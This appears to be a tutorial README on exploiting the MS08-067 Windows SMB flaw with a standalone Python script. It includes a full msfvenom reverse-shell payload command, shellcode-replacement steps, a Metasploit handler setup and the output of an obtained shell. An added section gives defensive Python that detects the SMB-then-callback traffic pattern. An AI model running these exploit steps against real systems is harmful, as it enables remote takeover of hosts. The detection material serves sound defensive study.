MS08-067-Python-Script-Exploit

Exploiting MS08-067 without using metasploit.




This has been quite tricky to get working, but in summary, from my experience, you can't use 'nc' as a listener for this because the payload needs to be STAGED (the small stager connects back and waits for the handler to send the rest of the payload), and 'nc' will only catch STAGELESS payloads, since it has no stage to send.


First, download the Python script (40279.py).


Next, run msfvenom with the arguments that suit your setup (LHOST/LPORT are the address and port your handler will listen on):

msfvenom -p windows/shell/reverse_tcp LHOST=x.x.x.x LPORT=8080  EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python -v shellcode --arch x86 --platform windows

Next, replace the shellcode in the Python script with the shellcode you have just generated with msfvenom.

Note - LEAVE THE FIRST THREE LINES (NOPs) IN THE PYTHON SCRIPT (lines 47, 48 and 49 of the script):

shellcode="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode+="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
---ENTER SHELLCODE HERE ---


Next, make a note of the operating system and service pack of the target you are trying to exploit.
There are 7 options to choose from:

1   Windows XP SP0/1 Universal
2   Windows 2000 Universal
3   Windows 2003 SP0 Universal
4   Windows 2003 SP1 English
5   Windows XP SP3 French (NX)
6   Windows XP SP3 English (NX)
7   Windows XP SP3 English (AlwaysOn NX)

Next - start Metasploit and set up a handler:
use exploit/multi/handler
set LHOST X.X.X.X
set LPORT XXXX
set payload windows/shell/reverse_tcp
exploit -j

Next, execute the Python script with the number that corresponds to the target's OS and service pack, like so:


python 40279.py 1

You should see the reverse shell returned.

msf exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on X.X.X.X:8080 
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to A.A.A.A
[*] Command shell session 10 opened (X.X.X.X:8080 -> A.A.A.A:1219) at 2017-02-00 15:55:22 +0000

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>


For reference, this is what the traffic looks like for a successful reverse TCP connection for this particular exploit: the attacker connects to the target over SMB, and a moment later the target opens a new TCP connection back to the handler, over which the stage is sent.
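From the defender's side, that traffic pattern is the thing to look for: an inbound SMB connection to a host, followed within seconds by that same host opening an outbound connection back to the machine that contacted it (or to an external address), over which a small blob (the 267-byte stage in the handler output above) is delivered. The following is an added example, not code from the original post or from the 40279.py script, that applies that correlation to connection-level flow records. The `Flow` record layout, the 30-second window, and all addresses, ports and times in `SAMPLE_FLOWS` are constructed assumptions for illustration.

```python
# Added example (not part of the original post or the exploit script): correlate
# flow records to spot the "SMB in, reverse TCP out" pattern described above.
from dataclasses import dataclass
from datetime import datetime, timedelta
from ipaddress import ip_address
from typing import Iterable

SMB_PORTS = {139, 445}          # ports over which the vulnerable Server service is reached
WINDOW = timedelta(seconds=30)  # assumed: how soon after the SMB connection the call-back must start


@dataclass(frozen=True)
class Flow:
    """One TCP connection as a flow collector would summarise it (assumed layout)."""
    start: datetime
    src: str           # initiator address
    sport: int
    dst: str           # responder address
    dport: int
    bytes_to_src: int  # bytes the responder sent back to the initiator


def find_reverse_shell_candidates(flows: Iterable[Flow], window: timedelta = WINDOW) -> list[dict]:
    """Return one finding per (inbound SMB connection, matching call-back) pair.

    A finding is raised when a host that just received an inbound SMB connection
    itself opens a new outbound connection on a non-SMB port, within `window`,
    either back to the host that contacted it over SMB or to any non-private address.
    """
    ordered = sorted(flows, key=lambda f: f.start)
    findings = []
    for i, smb in enumerate(ordered):
        if smb.dport not in SMB_PORTS:
            continue
        victim = smb.dst
        for later in ordered[i + 1:]:
            if later.start - smb.start > window:
                break  # flows are time-ordered, so nothing further can match this SMB connection
            if later.src != victim or later.dport in SMB_PORTS:
                continue
            back_to_initiator = later.dst == smb.src
            to_external = not ip_address(later.dst).is_private
            if back_to_initiator or to_external:
                findings.append({
                    "victim": victim,
                    "smb_from": f"{smb.src}:{smb.sport}",
                    "callback_to": f"{later.dst}:{later.dport}",
                    "delay_s": (later.start - smb.start).total_seconds(),
                    "stage_bytes": later.bytes_to_src,  # size of whatever the responder pushed first
                    "reason": "callback to SMB initiator" if back_to_initiator else "callback to external host",
                })
    return findings


# Constructed sample flows (addresses, ports and times are made up for this example).
T0 = datetime(2017, 2, 1, 15, 55, 0)
SAMPLE_FLOWS = [
    Flow(T0, "10.0.0.5", 49152, "10.0.0.20", 445, 1200),                                   # inbound SMB to the target
    Flow(T0 + timedelta(seconds=4), "10.0.0.20", 1219, "10.0.0.5", 8080, 267),              # target calls back, receives a 267-byte stage
    Flow(T0 + timedelta(minutes=5), "10.0.0.7", 50000, "10.0.0.20", 445, 40000),            # ordinary file-share traffic, no call-back
    Flow(T0 + timedelta(minutes=5, seconds=10), "10.0.0.20", 1300, "10.0.0.8", 80, 5000),  # unrelated internal web request
]

if __name__ == "__main__":
    for finding in find_reverse_shell_candidates(SAMPLE_FLOWS):
        print(finding)
```

Run against the constructed sample, only the first pair is reported: the later SMB connection from the file server is followed by an outbound request from the same host, but it goes to an unrelated private address, so it does not match. In practice the window and the "external address" test are the knobs to tune per environment; the point is the ordering and direction of the two connections, not the exact byte count, since the stage size depends on the encoder and payload chosen.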





